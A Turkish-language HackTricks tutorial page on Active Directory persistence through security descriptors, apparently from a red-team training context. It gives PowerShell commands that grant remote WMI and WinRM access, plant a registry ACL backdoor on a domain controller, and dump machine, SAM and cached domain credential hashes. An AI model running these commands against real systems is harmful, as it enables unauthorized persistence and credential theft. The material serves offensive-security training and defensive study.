Security Descriptors

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Güvenlik Tanımlayıcıları

Belgelerden: Güvenlik Tanımlayıcı Tanım Dili (SDDL), bir güvenlik tanımlayıcısını tanımlamak için kullanılan formatı tanımlar. SDDL, DACL ve SACL için ACE dizelerini kullanır: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Güvenlik tanımlayıcıları, bir nesnenin başka bir nesne üzerindeki izinlerini saklamak için kullanılır. Eğer bir nesnenin güvenlik tanımlayıcısında sadece küçük bir değişiklik yapabilirseniz, o nesne üzerinde, ayrıcalıklı bir grubun üyesi olmanıza gerek kalmadan, çok ilginç ayrıcalıklar elde edebilirsiniz.

Bu nedenle, bu kalıcılık tekniği, belirli nesneler üzerinde gereken her ayrıcalığı kazanma yeteneğine dayanır; böylece genellikle admin ayrıcalıkları gerektiren bir görevi admin olmadan gerçekleştirebilirsiniz.

WMI'ye Erişim

Bir kullanıcıya uzaktan WMI çalıştırma erişimi verebilirsiniz bunu kullanarak:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove

WinRM Erişimi

Bir kullanıcıya winrm PS konsoluna erişim verin bunu kullanarak:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Hash'lara uzaktan erişim

Kayıt defterine erişin ve hash'leri dökün, böylece DAMP kullanarak bir Reg arka kapısı oluşturun, böylece istediğiniz zaman bilgisayarın hash'ini, SAM'i ve bilgisayardaki herhangi bir önbelleklenmiş AD kimlik bilgilerini alabilirsiniz. Bu nedenle, bu izni bir normal kullanıcıya bir Alan Denetleyici bilgisayarı karşısında vermek çok faydalıdır:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Check Silver Tickets bilgisayar hesabının hash'ini bir Domain Controller üzerinde nasıl kullanabileceğinizi öğrenmek için.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousResource-based Constrained Delegation NextSID-History Injection

Last updated 8 days ago